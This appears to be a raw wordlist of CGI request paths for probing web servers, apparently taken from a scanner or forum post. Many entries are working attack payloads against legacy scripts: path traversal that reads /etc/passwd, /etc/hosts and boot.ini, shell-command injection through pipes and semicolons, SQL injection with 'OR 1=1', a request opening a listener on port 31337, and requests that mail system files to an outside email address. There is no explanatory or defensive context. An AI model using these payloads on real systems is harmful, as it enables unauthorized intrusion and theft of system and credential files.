/chat/!nicks.txt
/cgi-win/uploader.exe
/cgi-win/testcgi.exe?tata=xxxxxuseolstr
/cgi-win/Pbcgi.exe?tata=xxxxuseolstr
/cgi-win/
/cgiWebupdate.exe
/cgi-sys/PGPMail.pl
/cgi-sys/guestbook.cgi?user=cpanel&template=|pwd|
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shl
/cgi-script/CSSearch/CSSearch.cgi
/cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-local/
/cgi-home/
/cgi-dos/foo.cmd?xxx&dir
/cgi-dos/args.bat
/cgi-bin-sdb/
/cgi-bin2/MsmMask.exe?mask=/file.ext
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/cgi-bin/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/cgi-bin/xxxnonexistingyy.pl
/cgi-bin/xxxnonexistingyy.jsp
/cgi-bin/xxxnonexistingyy.exe
/cgi-bin/xxxnonexistingyy.bat
/cgi-bin/wwwthreads/changedisplay.pl
/cgi-bin/www-sql
/cgi-bin/wwwi32.exe/[in=c:\\boot.ini]
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwadmin.cgi
/cgi-bin/wsendmail.exe
/cgi-bin/ws_mail.cgi?kill=ng
/cgi-bin/wrap
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/whois_raw.cgi
/cgi-bin/whois/whois.cgi
/cgi-bin/whois.cgi
/cgi-bin/whois.cgi
/cgi-bin/wguest.exe
/cgi-bin/webwho.pl
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/webspirs.cgi?sp.nextform= webspirs.cgi
/cgi-bin/webshell
/cgi-bin/websendmail
/cgi-bin/webplus?script=
/cgi-bin/webplus.exe
/cgi-bin/webnews.cgi
/cgi-bin/webmail?WEBTEMPLATE=a&MAILTEMPLATE=b&EMAIL=a@bb.ne t&SUBJECT=test
/cgi-bin/webmail/login/xxxyyyzzz.authdaemon
/cgi-bin/webgais
/cgi-bin/webdriver
/cgi-bin/webdist.cgi
/cgi-bin/webdata_test.pl
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;l s|&CODE=PHOLD
/cgi-bin/webc.cgi/g/
/cgi-bin/webc.cgi
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&email= ldf@lasf.net&subject=dd&bO
/cgi-bin/web2mail.cgi
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/web_store.cgi?page=.html|ls|
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/wais.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/w3mail/login.cgi
/cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/view-source
/cgi-bin/utm/utm_stat?cmd=user_report&sid=q"%20OR%201=1%20OR%20 "q"="q
/cgi-bin/utm/utm_stat?cmd=change_lang&lang=ru",%20bill=10000,%2 0lang="ru&sid=validSID
/cgi-bin/utm/admin?cmd=full_view&sid=q"%20OR%201=1%20OR%20"q"=" q
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/cgi-bin/Users/default.users
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test99 9%0als
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=|ls+-als|
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=../cgi-bin/useradmin.pl%00.html
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id
/cgi-bin/urlcount.cgi
/cgi-bin/uploadn.asp
/cgi-bin/upload_pic.exe
/cgi-bin/upload_pdf.exe
/cgi-bin/upload.exe
/cgi-bin/upload.cgi
/cgi-bin/upload.asp
/cgi-bin/update_profile.cgi
/cgi-bin/update.dpgs
/cgi-bin/unlg1.1
/cgi-bin/uncgi
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/member
/cgi-bin/Ultimate.cgi
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/cgi-bin/tst2.bat
/cgi-bin/tst.bat
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/traceroute.pl
/cgi-bin/traceroute.cgi
/cgi-bin/textcounter.pl
/cgi-bin/texis/vortex.log
/cgi-bin/texis/monitor.log
/cgi-bin/texis/hoschiboschi
/cgi-bin/texis.exe/ngohos
/cgi-bin/testcgi.exe?xssstringo
/cgi-bin/test-cgi
/cgi-bin/test.txt;%20/bin/ls
/cgi-bin/test.pl
/cgi-bin/test.php3
/cgi-bin/test.exe
/cgi-bin/test.cgi
/cgi-bin/test.bat
/cgi-bin/test- cgi.bat
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview
/cgi-bin/sws/manager.pl?
/cgi-bin/survey.cgi
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/story.cgi?next=
/cgi-bin/store/agora.cgi?page=hoschi.html
/cgi-bin/store/__SQLUSER__
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/source.asp
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/smartsearch/smartsearch.cgi?keywords=cmdwithpipes
/cgi-bin/sitenews/sitenews.cgi?edit
/cgi-bin/sitenews.cgi?edit
/cgi-bin/simplestmail.cgi?redirect= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/config/menu
/cgi-bin/simple
/cgi-bin/showfile
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/shop.pl?page=xxx
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/ShellExample.cgi
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/cgi-bin/sgb/superguestconfig
/cgi-bin/sgb/superguest.cgi
/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extensi on=pl&config=pl&permissions=7
/cgi-bin/sessions.pl
/cgi-bin/session.pl
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/sendmail.cgi
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl
/cgi-bin/search.cgi?ul=BOF6000ortmpl=xxx
/cgi-bin/search.cgi?q=query
/cgi-bin/search.cgi%3fletter=
/cgi-bin/search.asp
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/scripts/cart.pl
/cgi-bin/script.bat%3f&dir
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/sawmill5?rfcf+"/etc/passwd"+spbn+1,1,21,1,1,1,1
/cgi-bin/rwwwshell.pl
/cgi-bin/rwcgi60?test&report=
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60.sh?test&report=
/cgi-bin/rwcgi60.exe?test&report=
/cgi-bin/rwcgi60.cgi?test&report=
/cgi-bin/rmp_query
/cgi-bin/rguest.exe
/cgi-bin/responder.cgi
/cgi-bin/readfile.tcl?file=/etc/master.passwd
/cgi-bin/query%3f
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/cgi-bin/psunami.cgi?action=board&board=1&topic=shellcmd
/cgi-bin/processit.pl
/cgi-bin/process_bug.cgi
/cgi-bin/printenv
/cgi-bin/ppdscgi.exe
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/post-query?
/cgi-bin/postings.cgi
/cgi-bin/postie.exe
/cgi-bin/postie.cgi
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/ho
/cgi-bin/postcard.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/plusmail
/cgi-bin/ping.cgi
/cgi-bin/pi?page=********/show_file&id=
/cgi-bin/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/php.in
/cgi-bin/php.cgi
/cgi-bin/phf
/cgi-bin/PGPMail.pl
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/cgi-bin/pbcgi.cgi?name=tistname&email=
/cgi-bin/passcfg
/cgi-bin/paramtool
/cgi-bin/pals-cgi?palsAction=restart&********Name=pals-cgi
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/OrderForm.cgi
/cgi-bin/openwebmail/userstat.pl
/cgi-bin/openwebmail- abook.pl?sessionid=test-session-0
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-bin/nph-test-cgi
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&*******=0
/cgi-bin/nph-maillist.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/netpad.cgi?proc=open&of=
/cgi-bin/netauth.cgi?cmd=show&page=../../
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=9966 04045&prev= main.html&
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/cgi-bin/msn.cgi
/cgi-bin/MsmSetup.exe?tst
/cgi-bin/MsmFind.exe
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/mojo/mojo.cgi
/cgi-bin/mmstdol.pl
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=& mgaction=&H_ShopID=&H_SID=&H_
/cgi-bin/math_sum.mscgi?a=BOV_87_chars
/cgi-bin/man.sh
/cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
/cgi-bin/makebook.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html =
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailFo rm=/cgi-bin/mailto
/cgi-bin/mailto.cgi
/cgi-bin/mailsend.exe
/cgi-bin/MailPost.exe
/cgi-bin/mailnews.cgi
/cgi-bin/mailmepro.exe
/cgi-bin/mailme.exe
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&orde r=2&searchkey=&search_fldnum=
/cgi-bin/mailform.pl
/cgi-bin/mailform.exe
/cgi-bin/mailform.cgi
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailf ile:c&Subject=tst&MailFrom=ts
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.co m&filename= mailfile.cgi
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=travers%00
/cgi-bin/mail.cgi
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom& page=./../../../../../etc/hosts
/cgi-bin/lsindex2.bat
/cgi-bin/lsin.exe
/cgi-bin/logbook/logbook.pl?file=cmdpipe
/cgi-bin/logbook.pl?file=cmdpipe
/cgi-bin/loadpage.cgi
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi-bin/lb5000/search.cgi
/cgi-bin/lastlines.cgi
/cgi-bin/jj
/cgi-bin/ion-p?page=../../../../../etc/hosts
/cgi-bin/ion-p.exe?page=c:\boot.ini
/cgi-bin/input2.bat
/cgi-bin/input.bat
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/infosrch.cgi
/cgi-bin/infogate
/cgi-bin/info2www
/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
/cgi-bin/imapncsa.exe
/cgi-bin/imapcern.exe
/cgi-bin/imagemap.exe
/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep =2&category=
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/ibillpm.pl
/cgi-bin/hwtestio
/cgi-bin/htsearch?exclude=%60%60
/cgi-bin/htsearch.cgi?exclude=%60%60
/cgi-bin/htmlscript
/cgi-bin/html_page?